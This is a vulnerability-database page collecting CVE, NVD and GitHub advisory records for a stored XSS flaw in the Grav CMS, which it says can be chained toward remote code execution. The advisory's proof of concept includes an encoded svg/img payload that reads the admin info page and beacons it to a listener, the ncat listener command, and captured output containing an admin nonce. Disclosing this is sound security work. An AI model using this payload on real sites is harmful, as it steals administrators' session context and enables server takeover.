CVE-2026-42611 (GCVE-0-2026-42611)
Vulnerability from cvelistv5 – Published: 2026-05-11 15:20 – Updated: 2026-05-11 18:23
VLAI
Title
Grav: Stored XSS via Tag Injection
Summary
Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE). This vulnerability is fixed in 2.0.0-beta.2.
Severity
8.9 (High)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/getgrav/grav/security/advisori… | x_refsource_CONFIRM |
| https://github.com/getgrav/grav/commit/5a12f9be83… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-42611",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-11T18:23:37.346111Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T18:23:59.282Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "grav",
"vendor": "getgrav",
"versions": [
{
"status": "affected",
"version": "\u003c 2.0.0-beta.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE). This vulnerability is fixed in 2.0.0-beta.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T15:20:47.890Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2"
},
{
"name": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
}
],
"source": {
"advisory": "GHSA-w8cg-7jcj-4vv2",
"discovery": "UNKNOWN"
},
"title": "Grav: Stored XSS via Tag Injection"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-42611",
"datePublished": "2026-05-11T15:20:47.890Z",
"dateReserved": "2026-04-29T00:31:15.726Z",
"dateUpdated": "2026-05-11T18:23:59.282Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-42611",
"date": "2026-05-30",
"epss": "0.00043",
"percentile": "0.13663"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-42611\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-11T16:17:34.173\",\"lastModified\":\"2026-05-12T16:16:44.470\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE). This vulnerability is fixed in 2.0.0-beta.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H\",\"baseScore\":8.9,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.8.0\",\"matchCriteriaId\":\"9C284702-7909-4A5C-91FE-392FC5BA58C7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:2.0.0:beta1:*:*:*:*:*:*\",\"matchCriteriaId\":\"1ABB323F-20AF-40F3-BCD9-262644D242A1\"}]}]}],\"references\":[{\"url\":\"https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Patch\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42611\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-11T18:23:37.346111Z\"}}}], \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-11T18:23:55.414Z\"}}], \"cna\": {\"title\": \"Grav: Stored XSS via Tag Injection\", \"source\": {\"advisory\": \"GHSA-w8cg-7jcj-4vv2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"getgrav\", \"product\": \"grav\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.0.0-beta.2\"}]}], \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2\", \"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663\", \"name\": \"https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE). This vulnerability is fixed in 2.0.0-beta.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-11T15:20:47.890Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-42611\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-11T18:23:59.282Z\", \"dateReserved\": \"2026-04-29T00:31:15.726Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-11T15:20:47.890Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-42611
Vulnerability from fkie_nvd - Published: 2026-05-11 16:17 - Updated: 2026-05-12 16:16
Severity
Summary
Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE). This vulnerability is fixed in 2.0.0-beta.2.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9C284702-7909-4A5C-91FE-392FC5BA58C7",
"versionEndIncluding": "1.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:getgrav:grav:2.0.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "1ABB323F-20AF-40F3-BCD9-262644D242A1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE). This vulnerability is fixed in 2.0.0-beta.2."
}
],
"id": "CVE-2026-42611",
"lastModified": "2026-05-12T16:16:44.470",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-11T16:17:34.173",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-W8CG-7JCJ-4VV2
Vulnerability from github – Published: 2026-05-05 21:36 – Updated: 2026-05-13 13:52
VLAI
Summary
Grav is Vulnerable to Stored XSS via Tag Injection
Details
Summary
A low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE).
Details
Affected endpoint: admin/pages/<page>
Affected code: system/src/Grav/Common/Security.php
public static function detectXss($string, array $options = null): ?string
{
// Skip any null or non string values
if (null === $string || !is_string($string) || empty($string)) {
return null;
}
if (null === $options) {
$options = static::getXssDefaults();
}
$enabled_rules = (array)($options['enabled_rules'] ?? null);
$dangerous_tags = (array)($options['dangerous_tags'] ?? null);
if (!$dangerous_tags) {
$enabled_rules['dangerous_tags'] = false;
}
$invalid_protocols = (array)($options['invalid_protocols'] ?? null);
if (!$invalid_protocols) {
$enabled_rules['invalid_protocols'] = false;
}
$enabled_rules = array_filter($enabled_rules, static function ($val) { return !empty($val); });
if (!$enabled_rules) {
return null;
}
// Keep a copy of the original string before cleaning up
$orig = $string;
// URL decode
$string = urldecode($string);
// Convert Hexadecimals
$string = (string)preg_replace_callback('!(&#|\\\)[xX]([0-9a-fA-F]+);?!u', static function ($m) {
return chr(hexdec($m[2]));
}, $string);
// Clean up entities
$string = preg_replace('!(&#[0-9]+);?!u', '$1;', $string);
// Decode entities
$string = html_entity_decode($string, ENT_NOQUOTES | ENT_HTML5, 'UTF-8');
// Strip whitespace characters
$string = preg_replace('!\s!u', ' ', $string);
$stripped = preg_replace('!\s!u', '', $string);
// Set the patterns we'll test against
$patterns = [
// Match any attribute starting with "on" or xmlns
'on_events' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"].*[\s|\'\"]>#iUu',
// Match javascript:, livescript:, vbscript:, mocha:, feed: and data: protocols
'invalid_protocols' => '#(' . implode('|', array_map('preg_quote', $invalid_protocols, ['#'])) . ')(:|\&\#58)\S.*?#iUu',
// Match -moz-bindings
'moz_binding' => '#-moz-binding[a-z\x00-\x20]*:#u',
// Match style attributes
'html_inline_styles' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(style=[^>]*(url\:|x\:expression).*)>?#iUu',
// Match potentially dangerous tags
'dangerous_tags' => '#</*(' . implode('|', array_map('preg_quote', $dangerous_tags, ['#'])) . ')[^>]*>?#ui'
];
// Iterate over rules and return label if fail
foreach ($patterns as $name => $regex) {
if (!empty($enabled_rules[$name])) {
if (preg_match($regex, $string) || preg_match($regex, $stripped) || preg_match($regex, $orig)) {
return $name;
}
}
}
return null;
}
Specifically the line:
'on_events' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"].*[\s|\'\"]>#iUu',
assumes that the on_events will always begin with either whitespace, ', " which can easily be bypassed with a simple payload like:
<img src=x onload=alert('1')>
This XSS Filter practice is broken. 1. Blacklisting every possible scenario that leads to XSS isn't possible. 2. Regex can't parse HTML.
It would be better to use an HTMLPurifier.
PoC
Grav Core + Admin Plugin
Grav Version: v1.7.49.5 - Admin v1.10.49.1
-
Create a low-privileged user with only enough permission to login and perform CRUD on Pages.
-
Login as the low-privileged user and browse to pages:
-
Create a post with the following content:
<svg><foreignObject><img src=x onerror=eval(atob('KGFzeW5jKCk9PntsZXQgcj1hd2FpdCBmZXRjaCgnL2dyYXYtYWRtaW4vYWRtaW4vY29uZmlnL2luZm8nKTtsZXQgdD1hd2FpdCByLnRleHQoKTtuYXZpZ2F0b3Iuc2VuZEJlYWNvbignaHR0cDovLzEyNy4wLjAuMTo4MDAxL2dyYXYtbG9nJyx0KX0pKCk7'))></foreignObject></svg>
The payload base64 is decoded to:
(async()=>{let r=await fetch('/grav-admin/admin/config/info');let t=await r.text();navigator.sendBeacon('http://127.0.0.1:8001/grav-log',t)})();
whenever a user with enough privilege visits the attacker-controlled page, a request will be made to the info endpoint and the response will be sent to attacker beacon/listener.
-
Save
-
Start a
ncatlistener on port8001.
┌──(kali㉿kali)-[~]
└─$ ncat -lvnp 8001
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8001
Ncat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)
Ncat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).
-
Now as a Super Admin visit the
/of Grav[http://localhost/grav-admin/](http://localhost/grav-admin/) for me:
-
We get a response with the
admin-nonceand the entire system information:
┌──(kali㉿kali)-[~]
└─$ ncat -lvnp 8001
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8001
Ncat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)
Ncat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).
POST /grav-log HTTP/1.1
Host: [127.0.0.1:8001](http://127.0.0.1:8001/)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: text/plain;charset=UTF-8
Content-Length: 127013
Origin: http://localhost/
Connection: keep-alive
Referer: http://localhost/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Priority: u=6
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Configuration: Info | Grav</title>
<meta name="description" content="">
<meta name="robots" content="noindex, nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" type="image/png" href="/grav-admin/user/plugins/admin/themes/grav/images/favicon.png">
<script type="text/javascript">
window.GravAdmin = window.GravAdmin || {};
window.GravAdmin.config = {
current_url: '/grav-admin/admin/config/info',
base_url_relative: '/grav-admin/admin',
base_url_simple: '/grav-admin',
route: 'info',
param_sep: ':',
enable_auto_updates_check: '1',
admin_timeout: '1800',
admin_nonce: '1265db72d897b4324cbe7d1781e66e3b',
<SNIPPED>
Impact
This is a Stored Cross-Site Scripting (XSS) vulnerability exploitable by a low-privileged user, which leads to exfiltration of the admin session context, including the admin_nonce. This nonce can be abused to bypass CSRF protections and authenticate further requests to sensitive admin endpoints. Given Grav’s support for scheduled tasks and extensible plugin architecture, this can be escalated to Remote Code Execution (RCE) under favorable conditions.
Affected Component: Grav Core + Admin Plugin (v1.7.49.5 / v1.10.49.1)
Impact: Full system compromise via RCE chain originating from low-privilege XSS.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Overall CVSS Score: 9.0
High Impact
Maintainer note — fix applied (2026-04-24)
Fixed in Grav core on the 2.0 branch: commit 5a12f9be8 — will ship in 2.0.0-beta.2. Two changes in tandem:
-
Regex bypass (detection layer) — the
on_eventsregex that missed unquoted handlers is tightened; see the companion GHSA-9695-8fr9-hw5q advisory for details. -
Missing dangerous tags —
svg,math,option, andselecthave been added to defaultsecurity.xss_dangerous_tagsinsystem/config/security.yaml.svgandmathallow inline scripting through their XML namespace and event-handler surface;option/selectare the tags attackers use to break out of the admin's select-template context before dropping the payload.
Combined with the tightened on_events regex, the PoC <svg>…<script>…</script></svg> (and the GHSA-c2q3 </option></select><img src=x onerror=alert(1)> variant) now trip at least one detector.
Files:
- system/config/security.yaml — dangerous-tags list extended.
- system/src/Grav/Common/Security.php — regex tightening.
- tests/unit/Grav/Common/Security/DetectXssTest.php.
Severity
8.9 (High)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "getgrav/grav"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.0-beta.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42611"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T21:36:27Z",
"nvd_published_at": "2026-05-11T16:17:34Z",
"severity": "HIGH"
},
"details": "### Summary\nA low-privileged (with the ability to create a page) user can cause XSS with the injection of `svg` element. The XSS can further be escalated to dump the entire system information available under `/admin/config/info` whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE).\n\n### Details\nAffected endpoint: `admin/pages/\u003cpage\u003e`\nAffected code: `system/src/Grav/Common/Security.php`\n\n```php\n public static function detectXss($string, array $options = null): ?string\n {\n // Skip any null or non string values\n if (null === $string || !is_string($string) || empty($string)) {\n return null;\n }\n\n if (null === $options) {\n $options = static::getXssDefaults();\n }\n\n $enabled_rules = (array)($options[\u0027enabled_rules\u0027] ?? null);\n $dangerous_tags = (array)($options[\u0027dangerous_tags\u0027] ?? null);\n if (!$dangerous_tags) {\n $enabled_rules[\u0027dangerous_tags\u0027] = false;\n }\n $invalid_protocols = (array)($options[\u0027invalid_protocols\u0027] ?? null);\n if (!$invalid_protocols) {\n $enabled_rules[\u0027invalid_protocols\u0027] = false;\n }\n $enabled_rules = array_filter($enabled_rules, static function ($val) { return !empty($val); });\n if (!$enabled_rules) {\n return null;\n }\n\n // Keep a copy of the original string before cleaning up\n $orig = $string;\n\n // URL decode\n $string = urldecode($string);\n\n // Convert Hexadecimals\n $string = (string)preg_replace_callback(\u0027!(\u0026#|\\\\\\)[xX]([0-9a-fA-F]+);?!u\u0027, static function ($m) {\n return chr(hexdec($m[2]));\n }, $string);\n\n // Clean up entities\n $string = preg_replace(\u0027!(\u0026#[0-9]+);?!u\u0027, \u0027$1;\u0027, $string);\n\n // Decode entities\n $string = html_entity_decode($string, ENT_NOQUOTES | ENT_HTML5, \u0027UTF-8\u0027);\n\n // Strip whitespace characters\n $string = preg_replace(\u0027!\\s!u\u0027, \u0027 \u0027, $string);\n $stripped = preg_replace(\u0027!\\s!u\u0027, \u0027\u0027, $string);\n\n // Set the patterns we\u0027ll test against\n $patterns = [\n // Match any attribute starting with \"on\" or xmlns\n \u0027on_events\u0027 =\u003e \u0027#(\u003c[^\u003e]+[a-z\\x00-\\x20\\\"\\\u0027\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\\u0027\\\"].*[\\s|\\\u0027\\\"]\u003e#iUu\u0027,\n\n // Match javascript:, livescript:, vbscript:, mocha:, feed: and data: protocols\n \u0027invalid_protocols\u0027 =\u003e \u0027#(\u0027 . implode(\u0027|\u0027, array_map(\u0027preg_quote\u0027, $invalid_protocols, [\u0027#\u0027])) . \u0027)(:|\\\u0026\\#58)\\S.*?#iUu\u0027,\n\n // Match -moz-bindings\n \u0027moz_binding\u0027 =\u003e \u0027#-moz-binding[a-z\\x00-\\x20]*:#u\u0027,\n\n // Match style attributes\n \u0027html_inline_styles\u0027 =\u003e \u0027#(\u003c[^\u003e]+[a-z\\x00-\\x20\\\"\\\u0027\\/])(style=[^\u003e]*(url\\:|x\\:expression).*)\u003e?#iUu\u0027,\n\n // Match potentially dangerous tags\n \u0027dangerous_tags\u0027 =\u003e \u0027#\u003c/*(\u0027 . implode(\u0027|\u0027, array_map(\u0027preg_quote\u0027, $dangerous_tags, [\u0027#\u0027])) . \u0027)[^\u003e]*\u003e?#ui\u0027\n ];\n\n // Iterate over rules and return label if fail\n foreach ($patterns as $name =\u003e $regex) {\n if (!empty($enabled_rules[$name])) {\n if (preg_match($regex, $string) || preg_match($regex, $stripped) || preg_match($regex, $orig)) {\n return $name;\n }\n }\n }\n\n return null;\n }\n```\n\nSpecifically the line:\n\n```php\n\u0027on_events\u0027 =\u003e \u0027#(\u003c[^\u003e]+[a-z\\x00-\\x20\\\"\\\u0027\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\\u0027\\\"].*[\\s|\\\u0027\\\"]\u003e#iUu\u0027,\n```\n\nassumes that the on_events will always begin with either `whitespace, \u0027, \"` which can easily be bypassed with a simple payload like:\n\n`\u003cimg src=x onload=alert(\u00271\u0027)\u003e`\n\nThis XSS Filter practice is broken.\n1. Blacklisting every possible scenario that leads to XSS isn\u0027t possible.\n2. Regex can\u0027t parse HTML.\n\nIt would be better to use an HTMLPurifier.\n### PoC\nGrav Core + Admin Plugin\nGrav Version: `v1.7.49.5 - Admin v1.10.49.1`\n\n1. Create a low-privileged user with only enough permission to login and perform CRUD on Pages.\n\n\n2. Login as the low-privileged user and browse to pages:\n\n\n3. Create a post with the following content:\n```\n\u003csvg\u003e\u003cforeignObject\u003e\u003cimg src=x onerror=eval(atob(\u0027KGFzeW5jKCk9PntsZXQgcj1hd2FpdCBmZXRjaCgnL2dyYXYtYWRtaW4vYWRtaW4vY29uZmlnL2luZm8nKTtsZXQgdD1hd2FpdCByLnRleHQoKTtuYXZpZ2F0b3Iuc2VuZEJlYWNvbignaHR0cDovLzEyNy4wLjAuMTo4MDAxL2dyYXYtbG9nJyx0KX0pKCk7\u0027))\u003e\u003c/foreignObject\u003e\u003c/svg\u003e\n```\n\nThe payload base64 is decoded to: \n\n```javascript\n(async()=\u003e{let r=await fetch(\u0027/grav-admin/admin/config/info\u0027);let t=await r.text();navigator.sendBeacon(\u0027http://127.0.0.1:8001/grav-log\u0027,t)})();\n```\n\nwhenever a user with enough privilege visits the attacker-controlled page, a request will be made to the `info` endpoint and the response will be sent to attacker beacon/listener.\n\n4. Save\n\n\n5. Start a `ncat` listener on port `8001`.\n\n```bash\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\n```\n\n6. Now as a Super Admin visit the `/` of Grav `[http://localhost/grav-admin/`](http://localhost/grav-admin/) for me:\n\n\n7. We get a response with the `admin-nonce` and the entire system information:\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\nPOST /grav-log HTTP/1.1\nHost: [127.0.0.1:8001](http://127.0.0.1:8001/)\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br, zstd\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 127013\nOrigin: http://localhost/\nConnection: keep-alive\nReferer: http://localhost/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: no-cors\nSec-Fetch-Site: cross-site\nPriority: u=6\n\n \u003c!DOCTYPE html\u003e\n \u003chtml lang=\"en\"\u003e\n \u003chead\u003e\n \u003cmeta charset=\"utf-8\" /\u003e\n \u003ctitle\u003eConfiguration: Info | Grav\u003c/title\u003e\n \u003cmeta name=\"description\" content=\"\"\u003e\n \u003cmeta name=\"robots\" content=\"noindex, nofollow\"\u003e\n \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"\u003e\n \u003clink rel=\"icon\" type=\"image/png\" href=\"/grav-admin/user/plugins/admin/themes/grav/images/favicon.png\"\u003e\n\n \n\n \n \u003cscript type=\"text/javascript\"\u003e\n window.GravAdmin = window.GravAdmin || {};\n window.GravAdmin.config = {\n current_url: \u0027/grav-admin/admin/config/info\u0027,\n base_url_relative: \u0027/grav-admin/admin\u0027,\n base_url_simple: \u0027/grav-admin\u0027,\n route: \u0027info\u0027,\n param_sep: \u0027:\u0027,\n enable_auto_updates_check: \u00271\u0027,\n admin_timeout: \u00271800\u0027,\n admin_nonce: \u00271265db72d897b4324cbe7d1781e66e3b\u0027,\n \n \n\u003cSNIPPED\u003e\n```\n\n### Impact\n\nThis is a **Stored Cross-Site Scripting (XSS)** vulnerability exploitable by a low-privileged user, which leads to **exfiltration of the admin session context**, including the **`admin_nonce`**. This nonce can be abused to **bypass CSRF protections** and **authenticate further requests** to sensitive admin endpoints. Given Grav\u2019s support for **scheduled tasks** and extensible plugin architecture, this can be escalated to **Remote Code Execution (RCE)** under favorable conditions.\n\n**Affected Component**: Grav Core + Admin Plugin (`v1.7.49.5` / `v1.10.49.1`) \n**Impact**: Full system compromise via RCE chain originating from low-privilege XSS.\n\n`CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H`\n`Overall CVSS Score: 9.0`\n`High Impact`\n\n---\n\n\n---\n\n## Maintainer note \u2014 fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) \u2014 will ship in **2.0.0-beta.2**. Two changes in tandem:\n\n1. **Regex bypass** (detection layer) \u2014 the `on_events` regex that missed unquoted 